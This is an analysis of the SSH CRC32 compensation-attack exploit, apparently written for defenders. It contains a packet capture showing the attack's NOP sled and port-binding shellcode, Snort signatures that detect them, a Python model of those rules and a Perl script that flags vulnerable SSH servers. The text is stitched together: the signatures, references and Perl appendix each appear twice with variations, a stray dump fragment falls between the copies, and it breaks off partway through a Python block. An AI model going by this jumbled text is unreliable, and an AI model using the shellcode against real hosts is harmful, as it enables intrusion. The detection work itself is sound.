Note the final log entry. When the exploit succeeds, the authentication exchange simply stops, because the shellcode's backdoor is already running and the attacker can connect to its port and do anything. The only catch is that the SSH daemon (at least SSH.com 1.2.31) times out because authentication never completes, which closes the spawned shell; in general there is a ten-minute window before the parent process of the listening shell is closed.

Network traffic analysis

========================

Tcpdump was used to capture the attack shown above; the capture is recorded in sshdx.dump[11] and can be fed to an IDS to derive attack signatures. If your IDS does not read tcpdump files, you can use "tcpreplay"[12] to replay the tcpdump capture for it.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The many connections the SSH daemon produced are then easy to pick out; with the "ngrep"[5] tool, the brute-force connections and the final one that inserted the shellcode can be identified:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
SSH-1.5-1.2.31.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
SSH-1.5-OpenSSH_2.2.0p1.
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
....Q/.......8..
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
.........4..
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
..W...2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2 ....
..2!......2$......2%......2(......2)......2,......2-......20......21..
....24......25......28......29......2<......2=......2@......2A......2D
......2E......2H......2I......2L......2M......2P......2Q......2T......
2U......2X......2Y......2\......2]......2`......2a......2d......2e....
..2h......2i......2l......2m......2p......2q......2t......2u......2x..
....2y......2|......2}......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......2.......2.......2...
....2.......2.......2.......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3 ......3!......3$......3%......
3(......3)......3,......3-......30......31......34......35......38....
..39......3<......3=......3@......3A......3D......3E......3H......3I..
....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
......3]......3`......3a......3d........1...p}.@
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......3i......3l......3m......3p......3q......3t......3u......3x......
3y......3|......3}......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......3.......3.......3.......
3.......3.......3.......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
....4)......4,......4-......40......41......44......45......48......49
......4<......4=......4@......4A......4D......4E......4H......4I......
4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
..4]......4`......4a......4d......4e......4h......4i......4l......4m..
....4p......4q......4t......4u......4x......4y......4|......4}......4.
......4.......4.......4.......4.......4.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4.......4.......4.......4.......4...
....4.......4.......4.......4.......4.......4.......4.......4.......4.
......4.......4.......4.......4.........1...p}.@
. . .
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
./bin/sh.h0h0h0, 7350, zip/TESO!......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

For this exploit you can therefore match on strings such as "h0h0h0, 7350, zip/TESO!" [7] and the NOP sled. The following signatures were written by Marty Roesch and Brian Caswell and can be used with Snort v1.8 or later[6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \

 flags:A+; content:"/bin/sh"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow filler"; \

 flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \

 flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow"; \

 flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \

 content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
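As an added illustration (not part of the original advisory or of Snort itself), the following Python models the content, offset and depth checks of the four rules above and runs them over constructed sample payloads. It assumes depth is counted from the offset (Snort 2.x semantics) and does not model the flags:A+ or $HOME_NET/$EXTERNAL_NET conditions.

```python
# Added example: a small model of the four Snort content rules above, run
# over constructed sample payloads. Not part of the original advisory or Snort.
# Assumptions: depth is counted from offset (Snort 2.x semantics); the
# flags:A+ and $HOME_NET/$EXTERNAL_NET conditions are not modelled.
from typing import List, Optional


def parse_content(spec: str) -> bytes:
    """Turn a Snort content string into raw bytes.

    Text between '|' bars is a space-separated hex byte list, everything
    else is literal text, e.g. 'a|90 90|b' -> b'a\\x90\\x90b'.
    """
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:                       # inside |...|
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)


class Content:
    """One content:/offset:/depth: triple from a rule."""

    def __init__(self, spec: str, offset: int = 0, depth: Optional[int] = None):
        self.pattern = parse_content(spec)
        self.offset = offset
        self.depth = depth

    def matches(self, payload: bytes) -> bool:
        # The search window starts at offset and, if depth is given, is
        # depth bytes long; without depth it runs to the end of the payload.
        end = len(payload) if self.depth is None else self.offset + self.depth
        return payload.find(self.pattern, self.offset, end) != -1


# The four rules from the text, keyed by their msg: field. Every content
# in a rule must match for the rule to fire.
RULES = {
    "EXPLOIT ssh CRC32 overflow /bin/sh": [Content("/bin/sh")],
    "EXPLOIT ssh CRC32 overflow filler": [
        Content("|00 00 00 00 00 00 00 00 00 00 00 00 00|")],
    "EXPLOIT ssh CRC32 overflow NOOP": [
        Content("|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|")],
    "EXPLOIT ssh CRC32 overflow": [
        Content("|00 01 57 00 00 00 18|", offset=0, depth=7),
        Content("|FF FF FF FF 00 00|", offset=8, depth=14)],
}


def alerts_for(payload: bytes, dst_port: int = 22) -> List[str]:
    """Return the msg: of every rule that fires on one TCP payload.

    All four rules are bound to destination port 22, so traffic to an
    sshd on another port (2222 in the lab run described in this article)
    is never inspected by them.
    """
    if dst_port != 22:
        return []
    return [msg for msg, contents in RULES.items()
            if all(c.matches(payload) for c in contents)]


# Constructed sample payloads (not captured traffic):
BANNER = b"SSH-1.5-OpenSSH_2.2.0p1\n"          # ordinary version exchange
NOP_SLED = b"\x90" * 32 + b"/bin/sh\x00"         # sled followed by shell string
HEADER = (bytes.fromhex("00015700000018")        # bytes 0-6: first content
          + b"\x00"                              # byte 7
          + bytes.fromhex("ffffffff0000")        # bytes 8-13: second content
          + b"\x00" * 16)                        # zero filler


if __name__ == "__main__":
    for name, pkt in (("banner", BANNER), ("nop sled", NOP_SLED),
                      ("header", HEADER)):
        print(f"{name:9s} -> {alerts_for(pkt)}")
    print(f"header to port 2222 -> {alerts_for(HEADER, dst_port=2222)}")
```

Note that the constructed header payload also trips the "filler" rule because of its trailing zero bytes, so one packet can raise several of these alerts.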

Identifying whether your hosts are vulnerable

===========================

You can use Jeremy Mates' ssh_scan.pl [8] and Niels Provos' ScanSSH scanner [9] to identify SSH servers and their versions.

Russell Fulton has also published a script for processing Argus [10] logs; it is included in the appendix below.

----------------------------------------------------------------------------

References

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen

 http://www.all.net/ForensiX/plac.html

[2] Netcat, by der Hobbit

 http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool

 http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] LiSt Open Files (lsof)

 http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter

 http://www.packetfactory.net/projects/ngrep/

[6] Snort

 http://www.snort.org/

[7] 7350.org / 7350

 http://www.7350.org/

 http://www.team-teso.org/about.php (see the bottom)

[8] ssh_scan.pl, by Jeremy Mates

 http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] ScanSSH scanner, by Niels Provos

 http://www.monkey.org/~provos/scanssh/

[10] Argus - network traffic audit tool

 http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump

 http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay

 http://packages.debian.org/testing/net/tcpreplay.html

Appendix A

==========

The two scanning scripts follow:

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
#     beavertail.dept.foo.edu(10.0.0.1)
#     lumpysoup.dept.foo.edu(10.0.0.2)
#     junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
#     hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.

%affected = (
    'Unknown', 'unknown',
    'SSH-1.4-1.2.14', 'not affected',
    'SSH-1.4-1.2.15', 'not affected',
    'SSH-1.4-1.2.16', 'not affected',
    'SSH-1.5-1.2.17', 'not affected',
    'SSH-1.5-1.2.18', 'not affected',
    'SSH-1.5-1.2.19', 'not affected',
    'SSH-1.5-1.2.20', 'not affected',
    'SSH-1.5-1.2.21', 'not affected',
    'SSH-1.5-1.2.22', 'not affected',
    'SSH-1.5-1.2.23', 'not affected',
    'SSH-1.5-1.2.24', 'affected',
    'SSH-1.5-1.2.25', 'affected',
    'SSH-1.5-1.2.26', 'affected',
    'SSH-1.5-1.2.27', 'affected',
    'SSH-1.5-1.2.28', 'affected',
    'SSH-1.5-1.2.29', 'affected',
    'SSH-1.5-1.2.30', 'affected',
    'SSH-1.5-1.2.31', 'affected',
    'SSH-1.5-1.2.31a', 'not affected',
    'SSH-1.5-1.2.32', 'not affected',
    'SSH-1.5-1.3.7', 'not affected',
    'SSH-1.5-Cisco-1.25', 'unknown',
    'SSH-1.5-OSU_1.5alpha1', 'unknown',
    'SSH-1.5-OpenSSH-1.2', 'affected',
    'SSH-1.5-OpenSSH-1.2.1', 'affected',
    'SSH-1.5-OpenSSH-1.2.2', 'affected',
    'SSH-1.5-OpenSSH-1.2.3', 'affected',
    'SSH-1.5-OpenSSH_2.5.1', 'not affected',
    'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
    'SSH-1.5-OpenSSH_2.9p1', 'not affected',
    'SSH-1.5-OpenSSH_2.9p2', 'not affected',
    'SSH-1.5-RemotelyAnywhere', 'not affected',
    'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
    'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
    'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
    'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
    'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
    'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
    'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
    'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',
    'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
    'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
    'SSH-1.99-OpenSSH-2.1', 'affected',
    'SSH-1.99-OpenSSH_2.1.1', 'affected',
    'SSH-1.99-OpenSSH_2.2.0', 'affected',
    'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
    'SSH-1.99-OpenSSH_2.3.0', 'not affected',
    'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
    'SSH-1.99-OpenSSH_2.5.1', 'not affected',
    'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
    'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
    'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
    'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
    'SSH-1.99-OpenSSH_2.9', 'not affected',
    'SSH-1.99-OpenSSH_2.9p1', 'not affected',
    'SSH-1.99-OpenSSH_2.9p2', 'not affected',
    'SSH-1.99-OpenSSH_3.0p1', 'not affected',
    'SSH-2.0-1.1.1', 'unknown',
    'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
    'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
    'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
    'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
    'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
    'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
    'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
    'SSH-2.0-OpenSSH_2.9p2', 'not affected',
);

# Make SURE you read the code first.
&IKnowWhatImDoing();

$all++, shift(@ARGV) if $ARGV[0] eq "-a";

while (<>) {
    chop;
    s/\s+/ /g;
    ($ip, $host, $version) = split(' ', $_);
    # Adjust this to identify other strings reported
    # by servers that have access restrictions, etc.
    # in place and do not show a specific version number.
    # They all fall under the category "Unknown" in this case.
    $version = "Unknown"
        if ($version eq "Couldn't" ||
            $version eq "Unknown" ||
            $version eq "You" ||
            $version eq "timeout");
    # Key the host table by "version:ip" so that sorting the keys
    # groups hosts by version for the two-level break report.
    $server{"$version:$ip"} = $host;
}

foreach $i (sort keys %server) {
    ($version, $ip) = split(":", $i);
    # Look the version up in the table above; anything not listed
    # is reported as "unknown" rather than silently as an empty status.
    $affected = $affected{$version};
    $affected = "unknown" unless defined $affected;
    next if ($affected eq "not affected" && ! $all);
    printf("\n\n%s (%s)\n", $version, $affected)
        if ($curver ne $version);
    $curver = $version;
    print "    " . $server{$i} . "($ip)\n";
}

exit(0);

sub IKnowWhatImDoing {
    local $IKnowWhatImDoing = 0;
    # Uncomment the following line to make this script work.
    # $IKnowWhatImDoing++;
    die "I told you to read the code first, didn't I?\n"
        unless $IKnowWhatImDoing;
    return;
}

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ...................................................................... ........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

For this particular exploit you can therefore match on the string "h0h0h0, 7350, zip/TESO!" [7], on the NOP sled, and so on. Keep in mind that these are attacker-chosen payload bytes which a modified copy of the exploit can change; the fourth rule below instead keys on fixed bytes, at fixed offsets, of the packet the exploit sends. The following signatures were written by Marty Roesch and Brian Caswell and can be used with Snort v1.8 or later [6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
    flags:A+; content:"/bin/sh"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow filler"; \
    flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
    flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
    (msg:"EXPLOIT ssh CRC32 overflow"; \
    flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
    content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
    classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Identifying whether your hosts are vulnerable
===========================

You can use Jeremy Mates' ssh_scan.pl [8] and Niels Provos' ScanSSH scanner [9] to identify SSH servers and the versions they run. Russell Fulton has also published a script for processing Argus [10] logs; it is included in the appendix below.

----------------------------------------------------------------------------

References
==========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
    http://www.all.net/ForensiX/plac.html

[2] Netcat, by der Hobbit
    http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool
    http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] LiSt Open Files (lsof)
    http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter
    http://www.packetfactory.net/projects/ngrep/

[6] Snort
    http://www.snort.org/

[7] 7350.org / 7350
    http://www.7350.org/
    http://www.team-teso.org/about.php (see the bottom)

[8] ssh_scan.pl, by Jeremy Mates
    http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] ScanSSH scanner, by Niels Provos
    http://www.monkey.org/~provos/scanssh/

[10] Argus - network traffic auditing tool
    http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump capture of the attack
    http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay
    http://packages.debian.org/testing/net/tcpreplay.html

Appendix A
==========

Two scanning scripts follow:

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
#
# SSH-1.5-1.2.31 (affected)
#     beavertail.dept.foo.edu(10.0.0.1)
#     lumpysoup.dept.foo.edu(10.0.0.2)
#     junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
#     hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.

%affected = (
    'Unknown',                  'unknown',
    'SSH-1.4-1.2.14',           'not affected',
    'SSH-1.4-1.2.15',           'not affected',
    'SSH-1.4-1.2.16',           'not affected',
    'SSH-1.5-1.2.17',           'not affected',
    'SSH-1.5-1.2.18',           'not affected',
    'SSH-1.5-1.2.19',           'not affected',
    'SSH-1.5-1.2.20',           'not affected',
    'SSH-1.5-1.2.21',           'not affected',
    'SSH-1.5-1.2.22',           'not affected',
    'SSH-1.5-1.2.23',           'not affected',
    'SSH-1.5-1.2.24',           'affected',
    'SSH-1.5-1.2.25',           'affected',
    'SSH-1.5-1.2.26',           'affected',
    'SSH-1.5-1.2.27',           'affected',
    'SSH-1.5-1.2.28',           'affected',
    'SSH-1.5-1.2.29',           'affected',
    'SSH-1.5-1.2.30',           'affected',
    'SSH-1.5-1.2.31',           'affected',
    'SSH-1.5-1.2.31a',          'not affected',
    'SSH-1.5-1.2.32',           'not affected',
    'SSH-1.5-1.3.7',            'not affected',
    'SSH-1.5-Cisco-1.25',       'unknown',
    'SSH-1.5-OSU_1.5alpha1',    'unknown',
    'SSH-1.5-OpenSSH-1.2',      'affected',
    'SSH-1.5-OpenSSH-1.2.1',    'affected',
    'SSH-1.5-OpenSSH-1.2.2',    'affected',
    'SSH-1.5-OpenSSH-1.2.3',    'affected',
    'SSH-1.5-OpenSSH_2.5.1',    'not affected',
    'SSH-1.5-OpenSSH_2.5.1p1',  'not affected',
    'SSH-1.5-OpenSSH_2.9p1',    'not affected',
    'SSH-1.5-OpenSSH_2.9p2',    'not affected',
    'SSH-1.5-RemotelyAnywhere', 'not affected',
    'SSH-1.99-2.0.11',          'affected w/Version 1 fallback',
    'SSH-1.99-2.0.12',          'affected w/Version 1 fallback',
    'SSH-1.99-2.0.13',          'affected w/Version 1 fallback',
    'SSH-1.99-2.1.0.pl2',       'affected w/Version 1 fallback',
    'SSH-1.99-2.1.0',           'affected w/Version 1 fallback',
    'SSH-1.99-2.2.0',           'affected w/Version 1 fallback',
    'SSH-1.99-2.3.0',           'affected w/Version 1 fallback',
    'SSH-1.99-2.4.0',           'affected w/Version 1 fallback',
    'SSH-1.99-3.0.0',           'affected w/Version 1 fallback',
    'SSH-1.99-3.0.1',           'affected w/Version 1 fallback',
    'SSH-1.99-OpenSSH-2.1',     'affected',
    'SSH-1.99-OpenSSH_2.1.1',   'affected',
    'SSH-1.99-OpenSSH_2.2.0',   'affected',
    'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
    'SSH-1.99-OpenSSH_2.3.0',   'not affected',
    'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
    'SSH-1.99-OpenSSH_2.5.1',   'not affected',
    'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
    'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
    'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
    'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
    'SSH-1.99-OpenSSH_2.9',     'not affected',
    'SSH-1.99-OpenSSH_2.9p1',   'not affected',
    'SSH-1.99-OpenSSH_2.9p2',   'not affected',
    'SSH-1.99-OpenSSH_3.0p1',   'not affected',
    'SSH-2.0-1.1.1',            'unknown',
    'SSH-2.0-2.3.0',            'affected w/Version 1 fallback',
    'SSH-2.0-2.4.0',            'affected w/Version 1 fallback',
    'SSH-2.0-3.0.0',            'affected w/Version 1 fallback',
    'SSH-2.0-3.0.1',            'affected w/Version 1 fallback',
    'SSH-2.0-OpenSSH_2.5.1p1',  'not affected',
    'SSH-2.0-OpenSSH_2.5.2p2',  'not affected',
    'SSH-2.0-OpenSSH_2.9.9p2',  'not affected',
    'SSH-2.0-OpenSSH_2.9p2',    'not affected',
);

# Make SURE you read the code first.
&IKnowWhatImDoing();

$all++, shift(@ARGV) if $ARGV[0] eq "-a";

while (<>) {
    chomp;
    s/\s+/ /g;
    ($ip, $host, $version) = split(' ', $_);
    # Adjust this to identify other strings reported
    # by servers that have access restrictions, etc.
    # in place and do not show a specific version number.
    # They all fall under the category "Unknown" in this case.
    $version = "Unknown"
        if ($version eq "Couldn't" ||
            $version eq "Unknown" ||
            $version eq "You" ||
            $version eq "timeout");
    # A version string missing from the table above is reported
    # as "unknown" rather than silently dropped.
    $affected{$version} = 'unknown' unless defined $affected{$version};
    # Key on "version:ip" so that a sort of the keys groups hosts
    # by server version, which is what the two-level break relies on.
    $server{"$version:$ip"} = $host;
}

foreach $i (sort keys %server) {
    ($version, $ip) = split(":", $i);
    next if ($affected{$version} eq "not affected" && ! $all);
    printf("\n\n%s (%s)\n", $version, $affected{$version})
        if ($curver ne $version);
    $curver = $version;
    print "    " . $server{$i} . "($ip)\n";
}
exit(0);

sub IKnowWhatImDoing {
    local $IKnowWhatImDoing = 0;
    # Uncomment the following line to make this script work.
    # $IKnowWhatImDoing++;
    die "I told you to read the code first, didn't I?\n"
        unless $IKnowWhatImDoing;
    return;
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
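The log pattern discussed in the sshd excerpt above (a burst of "crc32 compensation attack" fatals from one source, followed by a connection from that same source that ends only in "Timeout before authentication", or does not end at all while the shell is still bound) can be picked out mechanically. The Python below is an added example, not part of the original analysis and not taken from any tool it cites. Its log lines are constructed to mimic the sshd messages quoted above, and the burst threshold of three detector hits is an arbitrary assumption.

```python
"""Triage sshd log lines for the crc32 compensation attack pattern.

Added example, not from the original article.  The sample log is
constructed to look like the SSH 1.2.31 sshd messages quoted above.
"""
import re
from collections import Counter

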